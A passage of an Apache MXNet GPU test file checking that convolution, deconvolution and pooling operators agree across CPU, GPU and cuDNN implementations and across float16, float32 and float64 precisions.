sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed() @pytest.mark.serial def test_conv_deconv_guards(): # Test cases for convolution and deconvolution via strided fft. Ensure that the framework # guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5) # see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750 for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]: dataname = opname + '_data' ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}} test_cases = [ {'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}] for test_case_args in test_cases: try: sym = op(**test_case_args) sym_no_cudnn = op(cudnn_off=True, **test_case_args) check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1) except: print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args)) raise def _conv_with_num_streams(seed): with random_seed(seed): # Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad num_trials = 20 for _ in range(num_trials): size = np.random.randint(32, 128) # The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible # kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'. ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size), 'type_dict': {'conv_data': np.float32}} # Adding 'flip' here isolates the model from the input node (which can't use inplace store) flipped = mx.sym.flip(axis=0, name='conv') sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv') flipped_no_cudnn = mx.sym.flip(axis=0, name='conv') sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') try: # tol can be pretty high- we're looking for a large diff due to garbaged workspace check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2) except: print('Failing conv size = {}'.format(size)) raise @pytest.mark.skip(reason="skipping for now due to severe flakiness") @with_seed() def test_convolution_multiple_streams(): for num_streams in ['1', '2']: for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']: print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr) run_in_spawned_process(_conv_with_num_streams, {'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine}) print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() @pytest.mark.serial def test_convolution_large_c(): problematic_c = 64 * 1024 # The convolution accumulates many values, so scale the input magnitude. scale = 0.1 def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() @pytest.mark.serial def test_deconvolution_large_c(): problematic_c = 64 * 1024 # The deconvolution accumulates many values, so scale the input magnitude. scale = 0.1 def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) @with_seed() @pytest.mark.serial def test_convolution_versions(): # 2D convolution NCHW ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # 3D convolution NCDHW ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') syms = [conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # More max-pooling strides and pads to test cudnn pooling implementation code paths @with_seed() @pytest.mark.serial def test_pooling_nhwc_with_convention(): def make_pooling_syms(**kwargs): # Conventional NCHW layout pooling sym = mx.sym.Pooling(**kwargs) # NHWC pooling data = mx.sym.Variable('pool_data') sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1)) sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs) sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool') return [sym, sym_nhwc] # While the float32 and float64 output is reliably consistent, float16 departs occasionally. # We compare nhwc and nchw results only within a given precision. for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]: for kernel in [(2,2), (3,3), (4,4)]: for stride in [(1,1), (1,2), (2,1), (2,2)]: for data_type in [np.float64, np.float32, np.float16]: ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape, 'type_dict': {'pool_data': data_type}}] symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride, pooling_convention='valid', name='pool') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride, pooling_convention='full', name='pool') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency_NxM(symlist, ctx_list) @pytest.mark.serial def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) @with_seed() @pytest.mark.serial def test_deconvolution_with_type(): # Test basic deconvolution without exercising stride, pad or dilation. # 1D deconvolution sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add") # 2D deconvolution sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add") @with_seed() @pytest.mark.serial def test_deconvolution_options(): # 1D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # 3D deconvolution (not yet enabled) # ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # # Pad > 0 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # Stride > 1 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed(1234) def test_bilinear_sampler_with_type(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym = mx.sym.BilinearSampler(data=data, grid=grid) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float16}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_grid_generator_with_type(): data = mx.sym.Variable('data') sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20)) scale = 1 ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list, scale=scale) check_consistency(sym, ctx_list, scale=scale, grad_req="add") sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_spatial_transformer_with_type(): data = mx.sym.Variable('data') loc = mx.sym.Flatten(data) loc = mx.sym.FullyConnected(data=loc, num_hidden=10) loc = mx.sym.Activation(data=loc, act_type='relu') loc = mx.sym.FullyConnected(data=loc, num_hidden=6) sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear", cudnn_off=True) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear", cudnn_off=False) check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_pooling_with_type2(): # While the float32 and float64 output is reliably consistent, float16 departs occasionally. # We compare cpu and gpu results only within a given precision. for data_type in [np.float64, np.float32, np.float16]: ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}] sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum') check_consistency(sym, ctx_list) @with_seed() def test_pooling_nhwc_with_type(): def make_pooling_syms(**kwargs): # Conventional NCHW layout pooling sym = mx.sym.Pooling(**kwargs) # NHWC pooling data = mx.sym.Variable('pool_data') sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1)) sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs) sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool') return [sym, sym_nhwc] # While the float32 and float64 output is reliably consistent, float16 departs occasionally. # We compare nhwc and nchw results only within a given precision. for data_type in [np.float64, np.float32, np.float16]: # NHWC pooling only enabled on GPU with CUDNN ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}] symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') check_consistency_NxM(symlist, ctx_list) @with_seed() @pytest.mark.serial def test_pooling_versions(): # Produce the name of the 'transposed' layout, given the dimension def transposed_layout(ndim): if ndim < 3 or ndim > 5: raise RuntimeError("Invalid data dim, expecting 3, 4 or 5") return ('NWC', 'NHWC', 'NDHWC')[ndim-3] # default padding is all zeros def is_default_pad(pad): return pad == (0,) * len(pad) # default stride is all ones def is_default_stride(stride): return stride == (1,) * len(stride) # returns True/False randomly with equal probability def random_choice(): return np.random.random(1)[0] < 0.5 def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid', global_pool=False, p_value=2, count_include_pad=True, tol=None, dtype=np.float32): ctx_list = [] sym_list = [] for pool_ctx in pool_op_list: (pool_op, ctx_type) = pool_ctx.rsplit('_', 1) expected_ctxs = ['cpu', 'gpu', 'cudnn'] if ctx_type not in expected_ctxs: raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type)) ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0) ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}}) # start with pool args present in all cases pool_op_args = {'kernel': kernel, 'pool_type': pool_type, 'pooling_convention' : pooling_convention, 'name' : 'pool'} # add other args as needed if global_pool: pool_op_args['global_pool'] = True else: # Add pad and stride param if needed, plus randomly when it matches the default if not is_default_pad(pad) or random_choice(): pool_op_args.update({'pad' : pad}) if not is_default_stride(stride) or random_choice(): pool_op_args.update({'stride' : stride}) expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1'] if pool_op == 'pool_v1': sym = mx.sym.Pooling_v1(**pool_op_args) else: pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad}) if ctx_type != 'cpu': pool_op_args['cudnn_off'] = ctx_type == 'gpu' if pool_op == 'pool': # isolate pooling input from symbol input to test shared tensor optimizations buffered_input = mx.sym.identity(name='pool') sym = mx.sym.Pooling(buffered_input, **pool_op_args) elif pool_op == 'pool_transposed': ndim = len(data) # NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1); axes = (0,) + tuple(range(2,ndim)) + (1,) transposed = mx.sym.transpose(axes=axes, name='pool') pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim), **pool_op_args) # NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3); axes = (0, ndim-1) + tuple(range(1,ndim-1)) sym = mx.sym.transpose(data=pooled, axes=axes, name='pool') else: raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops, pool_op)) sym_list.append(sym) check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol) def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True, tol=None): if dim == '1D': data = (3, 3, 10) kernels = [(4,), (4,), (5,)] pads = [(0,), (2,), (2,)] strides = [(1,), (2,), (1,)] elif dim == '2D_no_padding': data = (3, 2, 20, 20) kernels = [(3, 3), (4, 5)] pads = [(0, 0), (0, 0)] strides = [(1, 1), (2, 1)] elif dim == '2D': data = (2, 2, 20, 20) kernels = [(3, 3), (3, 5), (4, 5), (4, 5)] pads = [(0, 0), (1, 2), (0, 0), (2, 3)] strides = [(1, 1), (1, 1), (2, 1), (1, 1)] elif dim == '3D': data = (2, 3, 20, 20, 20) kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)] pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)] strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)] else: raise RuntimeError('Unexpected pooling test class: {}.'.format(dim)) for kernel, pad, stride in zip(kernels, pads, strides): for pooling_convention in ['valid', 'full']: try: test_pooling_versions_helper(pool_op_list=pool_op_list, data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=False, p_value=p_value, count_include_pad=count_include_pad, tol=tol, dtype=dtype) except: print('pool_op_list = {}'.format(pool_op_list)) print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride)) print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type, pooling_convention)) print('p_value={}, count_include_pad={}, dtype={}'.format(p_value, count_include_pad, dtype)) print('environ = \n{}'.format(os.environ)) raise # Make sure kernel is ignored during global_pool by sometimes setting it to a crazy value kernel = kernels[0] if random_choice(): kernel = (300,) * len(kernel) test_pooling_versions_helper(pool_op_list=pool_op_list, data=data, kernel=kernel, pad=None, stride=None, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad, tol=tol, dtype=dtype) # The various implementations of the standard pooling operator std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu', 'pool_gpu', 'pool_transposed_gpu', 'pool_cudnn', 'pool_transposed_cudnn'] # The implementations of the 'v1' pooling operator v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu'] # For those cases when all implementations should match- the combined implementation list. combo_pool_op_list = std_pool_op_list + v1_pool_op_list for dtype in [np.float32, np.float64, np.float16]: # Testing of the standard (not 'v1') pooling operator is universal across all # data dimensions, implementations and layouts. for dim in ['1D', '2D', '3D']: test_pooling_dim(dim, 'max', dtype, std_pool_op_list) test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True) test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False) test_pooling_dim(dim, 'sum', dtype, std_pool_op_list) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2) test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3) # Testing of the 'v1' pooling operator is over its restricted support domain of # 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are # always tested against each other, and sometimes against the standard operator versions. # The slightly different 'v1' definition prevents this in the following cases: # # 1. In max pooling, when multiple input values are the maximum in the input window, # the 'v1' implementation backprops the gradient to all maxima, whereas the standard # pooling operator backprops the gradient to the lowest-indexed maximum only. # 2. In max pooling, the 'v1' operator pads with 0's and this value can become the # maximum output value in the case of an all-negative input. The standard pooling # operator effectively considers the padding to be the largest negative value, so # only input values should appear in the output. # 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor, # even at the edges, and so does not support count_include_pad = False. # 4. The float16 'v1' pooling operator performs forward sums and averages in # float16, whereas the std operators perform those calculations in float32, so # greater float16 tolerances are needed when comparing across implementations. # Double the float16 tol when comparing v1 and non-v1 implemenations, per note 4 above. relaxed_tol = {np.dtype(np.float16): 2e-1, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0, np.dtype(np.int64): 0} # Exclude std implementations due to points 1 and 2 above. test_pooling_dim('2D', 'max', dtype, v1_pool_op_list) # The standard and 'v1' implementations match for this case. test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True, tol=relaxed_tol) # Exclude std implementations due to point 3 above. test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False) # The standard and 'v1' implementations match for this case. test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol) # We can compare the standard and 'v1' max pooling implementations if we eliminate padding # (see point 2 above) and use np.float64 data so that no two random input window values are # likely to be the same (see point 1 above). test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list) @with_seed() def test_pooling_full_2d(): def test_pooling_full_2d_type(pool_type): data = (2, 2, 10, 10) kernel = (4, 5) pad = (1, 2) stride = (3, 4) convention = 'full' ctx_list = [] sym_list = [] # o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4 # o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4 ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=convention, global_pool=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, 